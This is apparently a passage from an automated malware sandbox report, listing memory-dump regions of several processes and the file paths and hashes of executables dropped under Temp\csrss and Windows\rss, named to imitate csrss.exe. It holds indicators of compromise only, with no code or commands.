SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/2792-154-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1384-157-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2792-158-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2456-159-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1384-160-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2456-161-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-163-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1384-164-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2456-165-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-167-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-169-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1384-170-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2456-171-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-173-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-175-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-177-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-179-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-181-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-183-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-185-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-187-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-189-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-191-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-193-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-195-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-197-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-199-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-201-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2456-203-0x0000000000400000-0x0000000001E11000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

MD5 dcb505dc2b9d8aac05f4ca0727f5eadb
SHA1 4f633edb62de05f3d7c241c8bc19c1e0be7ced75
SHA256 61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551
SHA512 31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

memory/2456-213-0x000000002E830000-0x000000002ED11000-memory.dmp

memory/2456-212-0x000000002E830000-0x000000002ED11000-memory.dmp

memory/2460-214-0x0000000000400000-0x00000000008E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

MD5 3f9efb357194473cab953809b99de1d9
SHA1 965f9ca65dd4aca3c187939e517ccd0d01f4eb8c
SHA256 2a48c93f1ba620cb25bb0f525d941bfc4fee31a88c8557374c51ed371d79846c
SHA512 b4879f0b2ffc3ec4a6e882297eaa7f7b0dd638c338214a2f625265b5ca613dd7d52dba86e3de39a948acece00ff2280f5c2fc1b7f5c73b032213a3e8bbc52feb

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

MD5 bf159166404b04a31431f2add9fd49df
SHA1 f35fe88d0d0d2126bbbffb35ea9236c315e0afe2
SHA256 5a0285bd3ec9e7bcac7519136cd4c2f4b91c57fb3dd3f20adad96d7af4f42a0c
SHA512 ee0d24f1a00c279b6832248fc1872b87985d984b6d2443e6eda4338d2f8f5cafa8952b0830ea1390f83e686c10dc81297bc0578550b62b31d256d3810c2fb590

\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

MD5 4faf9c08284389eb6da226f021f19b76
SHA1 5026cd752e9cd3d60a17ad6913d7b18f9be90376
SHA256 b1efcc45536a5e09d43a2c445b75ee2528c0592b427adf594d0c61e1a862ef76
SHA512 87ff2378c753771a9f5540073709dbd07b13934aec22a50311d3f2489bb618e3d5293b8941a57b6203b52beda091b1ae739cab3e789092b24d70fc1fb28ffbee

memory/2456-224-0x000000002E830000-0x000000002F0FD000-memory.dmp

memory/2456-225-0x000000002E830000-0x000000002F0FD000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

MD5 432fb2f6665f966c6b0129ec895264b6
SHA1 8bb4de0b21c1dd79928ead52dbfc34299d21f33e
SHA256 16a2c0f91a4859343275e64a41740c0bbbdd214df83dd0025e2b60b59c1611cf
SHA512 d6bb283dc181e9e29ab51d32b6680d863ebf6a1a173a314fedc260f66e43ec4a84dae37ba6bf972227ec6a57249b59c8d90d27d58417ee1d3ff373f59b5ea945

memory/1028-226-0x0000000000D60000-0x000000000162D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

MD5 ca82e3b218e364eeccf166bf13897ed7
SHA1 880322058dfe59ae4058fc5046606190f601e7aa
SHA256 f783ef79561fafeee08b9544c9c784c8490a68522d567c0187095d46cb34106f
SHA512 acd01de5f587c8ed7eb993e1a23ae1f92f31ce79c518823e2d14993580df762a008c62649ac4369cbd194be28e2f7b48634f57362a547cf3fe366cc90625be8f

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

MD5 488495d1165a23c03c96ebf36ed99965
SHA1 d12f1d61f43d64534cb1fbfd5fbda90f073b1dc7
SHA256 574aa12c0c7254003cac578ee5fe17d1879c9fc5c5957b6a46097e9fe0fd88ab
SHA512 fadf68af0eeb33acdc7db64f43a0f8da0d01a0d00b6defc8d1b3a64478de803153694753afa19d9c8eac9624e0db228f760ee5e2ff8921be5f0f2897e6910035

\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

MD5 52fabc2c588b04445c22a6e47498b361
SHA1 fe2ecbec6c5886a4a2ee24e338c22e8e78763af3
SHA256 f9dfe2b81aa7f9953857f3515253f0cb2c84607ffc57fc9e3fc11537339a9647
SHA512 ba7c033189d24609fffcfc369a136d842edc15c3cdf3fae0e135298db5d5f90a48cc26520be80ed8c7627e0fcce6c38298a799840ef003755dddfebf4021b1a5

\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

MD5 324bceacf69aa56d730beb22e55a6e69
SHA1 2b57f3f6babbf4447c599bb36c4897749e4b4aa2
SHA256 29ccc9a7cd0d0bc607474d2ba5ea6c3539759ec1a3f31e01090bab230db0d879
SHA512 1e74d6c1352c64124ff2bc6576745f96e8ea213132b04d640140ec4faf2074a03f29dc67bf36aa6103dd4dbe9ce64593d13b56a8f4d81b2254f9a61d6170bd08

memory/2456-235-0x000000002E830000-0x000000002ED18000-memory.dmp

memory/2456-236-0x000000002E830000-0x000000002ED18000-memory.dmp

memory/1948-237-0x0000000000400000-0x00000000008E8000-memory.dmp

memory/320-242-0x00000000000F0000-0x0000000000110000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe

MD5 d1a80170a9eaadd72657b982eca515bb
SHA1 64c09f7e57e9ec933e3e2dcf591ace674819fcdb
SHA256 9b9f946dca5489e5eabcfa06f9df4be8623917353b1e6f36af49f04a95ebd9c1
SHA512 ff7e83872d7bda5383b6745717a32dd7400b3c696298ae7ddc23dc9d13b592023bb731844046e7594be14d8611d1f300475caa399fddfa53b4138af100f022ca

C:\Windows\rss\csrss.exe

MD5 9f2548caa1b20ef77e2b078a721dfd19
SHA1 44f6e968ded4e3297920e14a82c8af070bd85781
SHA256 67247b6be1d682b96fd80ba4a4715169dc68bc0e2a118fd634e4b9aa20a32031
SHA512 ad84d7f367b1cb51cfa9efe5130523a3b33511f0d754e94b0c4eb13ce0dfe8293c1a7890f204931c1a08b684e3b98e4b1ba4b3d0676010ada26f3922f40dbedc

\Windows\rss\csrss.exe

MD5 eed3a4d31c5e3d45cf9ecba38c173fab
SHA1 122788bed73167c5cb5ce792f15c24f3202b8932
SHA256 2dc65422a68392cce6902cffa66d8a7ddaee844af813b65b8e3bad9d324d0297
SHA512 02121758d9745f601d56e88f5cd2289a78843bca9b2ff554bc24419d30285abd9e73f43f3c7933ca9d9d275784e3b3c7da50dae6d9cfab69c87c3a9b90d34381

memory/2060-246-0x0000000003760000-0x0000000003B58000-memory.dmp

memory/2460-245-0x0000000000400000-0x00000000008E1000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe

MD5 68ef1fe143331e4391503dc751d0c2e2
SHA1 432dd86279a283a8899a5cffc98ff97bf5dd973b
SHA256 21d1593e1d388c6f8969f950f836eb759f4182dc0ae49e64c4e3e42dc3991a87
SHA512 7209b6bd7fda16d5b553e31b959fb40c3fbe55ffbb8acf9d17b3e1aed9181be5e91389b680e37b89d45e613af0d0063a2196756d1f7772fa5e95ad8a19302feb

memory/2060-247-0x0000000003760000-0x0000000003B58000-memory.dmp

memory/2060-248-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2060-249-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/2060-250-0x0000000003760000-0x0000000003B58000-memory.dmp

memory/320-251-0x0000000000500000-0x0000000000520000-memory.dmp

memory/320-252-0x00000000005B0000-0x00000000005D0000-memory.dmp

memory/2456-253-0x0000000000400000-0x0000000001E11000-memory.dmp

memory/1028-255-0x0000000000D60000-0x000000000162D000-memory.dmp

memory/2456-257-0x000000002E830000-0x000000002ED11000-memory.dmp

memory/2456-258-0x000000002E830000-0x000000002ED11000-memory.dmp

memory/2456-259-0x000000002E830000-0x000000002F0FD000-memory.dmp